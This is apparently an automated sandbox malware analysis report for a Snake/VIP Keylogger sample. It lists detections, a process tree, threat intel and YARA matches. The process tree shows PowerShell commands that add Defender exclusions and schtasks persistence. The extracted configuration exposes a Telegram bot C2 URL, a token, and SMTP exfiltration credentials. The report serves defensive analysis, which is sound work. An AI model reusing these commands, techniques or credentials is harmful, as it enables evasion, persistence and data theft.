Edit tour

Windows Analysis Report
FT876567090.exe

Overview

General Information

Sample name:	FT876567090.exe
Analysis ID:	1576083
MD5:	773778752662f5a81d6b7a2015890b79
SHA1:	662be6bed03ec5afac72029459157d7908797622
SHA256:	86f02fd88dc04b311ec6ae30fc2e4fc8be6884f24654a5103b7fb85f7631f99c
Tags:	exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FT876567090.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\FT876567090.exe" MD5: 773778752662F5A81D6B7A2015890B79)

powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7872 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FT876567090.exe (PID: 8124 cmdline: "C:\Users\user\Desktop\FT876567090.exe" MD5: 773778752662F5A81D6B7A2015890B79)

EYDNKhhJr.exe (PID: 4176 cmdline: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe MD5: 773778752662F5A81D6B7A2015890B79)

schtasks.exe (PID: 7304 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EYDNKhhJr.exe (PID: 3704 cmdline: "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe" MD5: 773778752662F5A81D6B7A2015890B79)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat_id": "6443825857", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x361cf:$a1: get_encryptedPassword 0x361a3:$a2: get_encryptedUsername 0x36267:$a3: get_timePasswordChanged 0x3617f:$a4: get_passwordField 0x361e5:$a5: set_encryptedPassword 0x35fb2:$a7: get_logins 0x31876:$a10: KeyLoggerEventArgs 0x31845:$a11: KeyLoggerEventArgsEventHandler 0x36086:$a13: _encryptedPassword
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ffa1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f644:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f8a1:$a4: \Orbitum\User Data\Default\Login Data 0x40280:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33da8:$s1: UnHook 0x33d44:$s2: SetHook 0x33d7d:$s3: CallNextHook 0x33d0c:$s4: _hook
0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76f35:$a1: get_encryptedPassword 0x76f09:$a2: get_encryptedUsername 0x76fcd:$a3: get_timePasswordChanged 0x76ee5:$a4: get_passwordField 0x76f4b:$a5: set_encryptedPassword 0x76d18:$a7: get_logins 0x725dc:$a10: KeyLoggerEventArgs 0x725ab:$a11: KeyLoggerEventArgsEventHandler 0x76dec:$a13: _encryptedPassword
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x352af:$a1: get_encryptedPassword 0x35283:$a2: get_encryptedUsername 0x35347:$a3: get_timePasswordChanged 0x3525f:$a4: get_passwordField 0x352c5:$a5: set_encryptedPassword 0x35092:$a7: get_logins 0x30956:$a10: KeyLoggerEventArgs 0x30925:$a11: KeyLoggerEventArgsEventHandler 0x35166:$a13: _encryptedPassword
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e724:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e981:$a4: \Orbitum\User Data\Default\Login Data 0x3f360:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e88:$s1: UnHook 0x32e24:$s2: SetHook 0x32e5d:$s3: CallNextHook 0x32dec:$s4: _hook
0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: FT876567090.exe PID: 7408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: FT876567090.exe PID: 8124	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FT876567090.exe PID: 8124	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: FT876567090.exe PID: 8124	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: FT876567090.exe PID: 8124	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8317:$a1: get_encryptedPassword 0x81ba5:$a1: get_encryptedPassword 0x82eb:$a2: get_encryptedUsername 0x81b79:$a2: get_encryptedUsername 0x83af:$a3: get_timePasswordChanged 0x81c3d:$a3: get_timePasswordChanged 0x82c7:$a4: get_passwordField 0x81b55:$a4: get_passwordField 0x832d:$a5: set_encryptedPassword 0x81bbb:$a5: set_encryptedPassword 0x8103:$a7: get_logins 0x81991:$a7: get_logins 0x4b2c:$a10: KeyLoggerEventArgs 0x7e2a7:$a10: KeyLoggerEventArgs 0x4afb:$a11: KeyLoggerEventArgsEventHandler 0x7e276:$a11: KeyLoggerEventArgsEventHandler 0x81ce:$a13: _encryptedPassword 0x81a5c:$a13: _encryptedPassword
Process Memory Space: EYDNKhhJr.exe PID: 4176	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: EYDNKhhJr.exe PID: 3704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EYDNKhhJr.exe PID: 3704	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: EYDNKhhJr.exe PID: 3704	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: EYDNKhhJr.exe PID: 3704	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5340e:$a1: get_encryptedPassword 0x533e2:$a2: get_encryptedUsername 0x534a6:$a3: get_timePasswordChanged 0x533be:$a4: get_passwordField 0x53424:$a5: set_encryptedPassword 0x531fa:$a7: get_logins 0x4fc23:$a10: KeyLoggerEventArgs 0x4fbf2:$a11: KeyLoggerEventArgsEventHandler 0x532c5:$a13: _encryptedPassword
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.EYDNKhhJr.exe.448c7b0.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.FT876567090.exe.45117a8.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f120:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
0.2.FT876567090.exe.39f4448.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.EYDNKhhJr.exe.4459990.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2eea0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f520:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
0.2.FT876567090.exe.45117a8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33120:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.EYDNKhhJr.exe.4459990.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x4fed0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x32ea0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33520:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51baa:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x517f0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50ca8:$s6: constructor or from DllMain.
10.2.FT876567090.exe.2f20000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.2f20000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.FT876567090.exe.2f20000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.FT876567090.exe.2f20000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x343cf:$a1: get_encryptedPassword 0x343a3:$a2: get_encryptedUsername 0x34467:$a3: get_timePasswordChanged 0x3437f:$a4: get_passwordField 0x343e5:$a5: set_encryptedPassword 0x341b2:$a7: get_logins 0x2fa76:$a10: KeyLoggerEventArgs 0x2fa45:$a11: KeyLoggerEventArgsEventHandler 0x34286:$a13: _encryptedPassword
10.2.FT876567090.exe.2f20000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e1a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d844:$a3: \Google\Chrome\User Data\Default\Login Data 0x3daa1:$a4: \Orbitum\User Data\Default\Login Data 0x3e480:$a5: \Kometa\User Data\Default\Login Data
10.2.FT876567090.exe.2f20000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31fa8:$s1: UnHook 0x31f44:$s2: SetHook 0x31f7d:$s3: CallNextHook 0x31f0c:$s4: _hook
15.2.EYDNKhhJr.exe.2f9fd66.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.EYDNKhhJr.exe.2f9fd66.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.EYDNKhhJr.exe.2f9fd66.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.FT876567090.exe.5560000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.5560000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.FT876567090.exe.5560000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.EYDNKhhJr.exe.2f9fd66.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x343cf:$a1: get_encryptedPassword 0x343a3:$a2: get_encryptedUsername 0x34467:$a3: get_timePasswordChanged 0x3437f:$a4: get_passwordField 0x343e5:$a5: set_encryptedPassword 0x341b2:$a7: get_logins 0x2fa76:$a10: KeyLoggerEventArgs 0x2fa45:$a11: KeyLoggerEventArgsEventHandler 0x34286:$a13: _encryptedPassword
10.2.FT876567090.exe.2f20f20.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.2f20f20.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.FT876567090.exe.2f20f20.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.FT876567090.exe.2f20f20.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.FT876567090.exe.5560000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x336af:$a1: get_encryptedPassword 0x33683:$a2: get_encryptedUsername 0x33747:$a3: get_timePasswordChanged 0x3365f:$a4: get_passwordField 0x336c5:$a5: set_encryptedPassword 0x33492:$a7: get_logins 0x2ed56:$a10: KeyLoggerEventArgs 0x2ed25:$a11: KeyLoggerEventArgsEventHandler 0x33566:$a13: _encryptedPassword
15.2.EYDNKhhJr.exe.2f9fd66.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e1a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d844:$a3: \Google\Chrome\User Data\Default\Login Data 0x3daa1:$a4: \Orbitum\User Data\Default\Login Data 0x3e480:$a5: \Kometa\User Data\Default\Login Data
10.2.FT876567090.exe.5560000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.5560000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.FT876567090.exe.5560000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.FT876567090.exe.5560000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.FT876567090.exe.5560000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d481:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cb24:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cd81:$a4: \Orbitum\User Data\Default\Login Data 0x3d760:$a5: \Kometa\User Data\Default\Login Data
15.2.EYDNKhhJr.exe.2f9fd66.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31fa8:$s1: UnHook 0x31f44:$s2: SetHook 0x31f7d:$s3: CallNextHook 0x31f0c:$s4: _hook
10.2.FT876567090.exe.5560000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31288:$s1: UnHook 0x31224:$s2: SetHook 0x3125d:$s3: CallNextHook 0x311ec:$s4: _hook
10.2.FT876567090.exe.2f20f20.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.2f20f20.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.FT876567090.exe.2f20f20.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.FT876567090.exe.449a788.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x940d0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x770a0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x77720:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0xaa140:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x95daa:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x959f0:$s5: delete[] 0x94ea8:$s6: constructor or from DllMain.
